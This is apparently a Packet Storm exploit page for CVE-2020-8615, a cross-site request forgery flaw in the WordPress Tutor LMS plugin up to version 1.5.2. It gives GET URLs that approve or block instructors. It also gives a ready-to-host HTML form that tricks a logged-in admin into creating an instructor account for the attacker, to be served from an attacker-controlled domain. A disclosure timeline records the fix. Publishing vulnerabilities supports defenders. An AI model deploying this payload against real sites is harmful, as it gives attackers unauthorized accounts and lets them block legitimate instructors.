what you don't know can hurt you

WordPress Tutor LMS 1.5.3 Cross Site Request Forgery

WordPress Tutor LMS 1.5.3 Cross Site Request Forgery
Posted Mar 2, 2020
Authored by Jinson Varghese Behanan

WordPress Tutor LMS plugin version 1.5.3 suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
advisories | CVE-2020-8615
MD5 | a3195f351910c4acd40c82f3afff25c6

WordPress Tutor LMS 1.5.3 Cross Site Request Forgery

Change Mirror Download
# Exploit Title: Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery (Add User)
# Date: 2020-01-30
# Vendor Homepage: https://www.themeum.com/product/tutor-lms/
# Vendor Changelog: https://wordpress.org/plugins/tutor/#developers
# Exploit Author: Jinson Varghese Behanan
# Author Advisory: https://www.getastra.com/blog/911/plugin-exploit/cross-site-request-forgery-in-tutor-lms-plugin/
# Author Homepage: https://www.jinsonvarghese.com
# Version: 1.5.2 and below
# CVE : CVE-2020-8615

# 1. Description

# The Tutor LMS WordPress plugin is a feature-packed plugin that enables users to create and sell courses.
# An attacker can use CSRF to register themselves as an instructor or block other legit instructors.
# Consequently, if the option to create courses without admin approval is enabled on the plugin’s settings
# page, the attacker will be able to create courses directly as well. All WordPress websites
# using Tutor LMS version 1.5.2 and below are affected.

# 2. Proof of Concept

# As the requests for the approval and blocking of instructors are sent using the GET method, the CSRF
# attack to approve an attacker-controlled instructor account can be performed by having the admin
# visit https://TARGET/wp-admin/admin.php?page=tutor-instructors&action=approve&instructor=8 directly,
# after retrieving the instructor ID during the registration process. An approved instructor can also be blocked
# by directing the admin to visit https://TARGET/wp-admin/admin.php?page=tutor-instructors&action=blocked&instructor=7.

# CSRF attack can also be performed on the form present at https://TARGET/wp-admin/admin.php?page=tutor-instructors&sub_page=add_new_instructor
# in order to have the admin add an instructor account for the attacker, thus bypassing the requirement for approval.
# This can be done by tricking the admin to submit the below-given web form as a POST request. For example, if the web form is
# hosted on an attacker-controlled domain https://attacker.com/csrf.html, an admin who is logged in at https://TARGET can
# be tricked into visiting the link and triggering the request to add an instructor.

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://TARGET/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="add_new_instructor" />
<input type="hidden" name="first_name" value="John" />
<input type="hidden" name="last_name" value="Doe" />
<input type="hidden" name="user_login" value="jd_instructor" />
<input type="hidden" name="email" value="jd@TARGET" />
<input type="hidden" name="phone_number" value="1231231231" />
<input type="hidden" name="password" value="Pa$$w0rd!" />
<input type="hidden" name="password_confirmation" value="Pa$$w0rd!" />
<input type="hidden" name="tutor_profile_bio" value="Et tempore culpa n" />
<input type="hidden" name="action" value="tutor_add_instructor" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

3. Timeline

Vulnerability reported to the Tutor LMS team – January 30, 2020.
Tutor LMS version 1.5.3 containing the fix released – February 4, 2020.
Login or Register to add favorites

File Archive:

January 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    4 Files
  • 2
    Jan 2nd
    3 Files
  • 3
    Jan 3rd
    3 Files
  • 4
    Jan 4th
    33 Files
  • 5
    Jan 5th
    31 Files
  • 6
    Jan 6th
    21 Files
  • 7
    Jan 7th
    15 Files
  • 8
    Jan 8th
    19 Files
  • 9
    Jan 9th
    1 Files
  • 10
    Jan 10th
    1 Files
  • 11
    Jan 11th
    33 Files
  • 12
    Jan 12th
    19 Files
  • 13
    Jan 13th
    27 Files
  • 14
    Jan 14th
    8 Files
  • 15
    Jan 15th
    16 Files
  • 16
    Jan 16th
    1 Files
  • 17
    Jan 17th
    2 Files
  • 18
    Jan 18th
    20 Files
  • 19
    Jan 19th
    32 Files
  • 20
    Jan 20th
    15 Files
  • 21
    Jan 21st
    10 Files
  • 22
    Jan 22nd
    16 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close